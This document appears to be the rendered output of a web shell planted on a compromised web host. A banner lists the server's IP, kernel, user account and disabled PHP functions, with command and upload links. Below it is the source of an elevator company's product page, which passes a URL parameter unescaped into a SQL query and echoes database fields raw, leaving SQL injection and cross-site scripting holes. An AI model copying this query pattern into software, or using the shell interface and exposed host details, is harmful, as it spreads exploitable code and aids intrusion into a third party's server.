|
Server IP : 103.212.121.57 / Your IP : 216.73.216.123 Web Server : LiteSpeed System : Linux valor.herosite.pro 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64 User : araipddz ( 1784) PHP Version : 8.2.30 Disable Function : show_source, system, shell_exec, passthru, popen, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/araipddz/cytelelevators.in/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!doctype html>
<html class="no-js" lang="en">
<head>
<!-- title -->
<meta name="google-site-verification" content="Fxq9I7YKJWXY1zUXCad7SVWiFCCAdqYCDUDXu8cwWdU" />
<title>Cytel Elevators</title>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1" />
<link rel="canonical" href="" />
<script type="text/jscript" src="js/validate2.js"></script>
<!-- favicon -->
<!-- animation -->
<link rel="stylesheet" href="css/animate.css" />
<!-- bootstrap -->
<link rel="stylesheet" href="css/bootstrap.min.css" />
<!-- et line icon -->
<link rel="stylesheet" href="css/et-line-icons.css" />
<!-- font-awesome icon -->
<link rel="stylesheet" href="css/font-awesome.min.css" />
<!-- themify icon -->
<link rel="stylesheet" href="css/themify-icons.css">
<!-- swiper carousel -->
<link rel="stylesheet" href="css/swiper.min.css">
<!-- justified gallery -->
<link rel="stylesheet" href="css/justified-gallery.min.css">
<!-- magnific popup -->
<link rel="stylesheet" href="css/magnific-popup.css" />
<!-- revolution slider -->
<link rel="stylesheet" type="text/css" href="revolution/css/settings.css" media="screen" />
<link rel="stylesheet" type="text/css" href="revolution/css/layers.css">
<link rel="stylesheet" type="text/css" href="revolution/css/navigation.css">
<!-- bootsnav -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
<link rel="stylesheet" href="css/bootsnav.css">
<!-- style -->
<link rel="stylesheet" href="css/style.css" />
<!-- responsive css -->
<link rel="stylesheet" href="css/responsive.css" />
<!--[if IE]>
<script src="js/html5shiv.js"></script>
<![endif]-->
<style>
.dropdown-menu {
min-width: 0;
}
/* Hide the content on small devices */
/* Hide the content on small devices */
@media (max-width: 767px) {
.jy {
display: none;
}
}
</style>
</head>
<body>
<?php
include('header.php');
?>
<section class="wow fadeIn __web-inspector-hide-shortcut__" style="visibility: visible; animation-name: fadeIn; margin-top: 100px;">
<div class="container">
<div class="row">
<?php
$id=$_GET['id'];
$select = "SELECT * FROM `product` WHERE id='$id'";
$query = mysqli_query($connect, $select);
while ($row = mysqli_fetch_assoc($query)) {
?>
<div class="col-12 col-lg-8 text-center text-lg-left md-margin-30px-bottom md-padding-80px-lr sm-padding-15px-lr wow fadeIn" style="visibility: visible; animation-name: fadeIn;">
<h5 class="alt-font font-weight-600 text-extra-dark-gray text-uppercase lg-width-100"><?php echo $row['pro_name']?></h5>
<div class="separator-line-verticle-extra-small bg-extra-dark-gray width-100 md-width-80 mx-auto ml-lg-0 margin-30px-bottom md-margin-20px-bottom"></div>
<p class="width-95 lg-width-100 text-justify"><?php echo $row['pro_description']?></p>
</div>
<div class="col-12 col-lg-4 col-md-6 wow fadeIn mt-5" data-wow-delay="0.4s" style="visibility: visible; animation-delay: 0.4s; animation-name: fadeIn;">
<img src="./admin/product/<?php echo $row['pro_image'] ?>" alt="Service Maintainence" style="height: 400px;" data-no-retina="">
</div>
<?php
}
?>
</div>
</div>
</section>
<?php
include('footer.php');
?>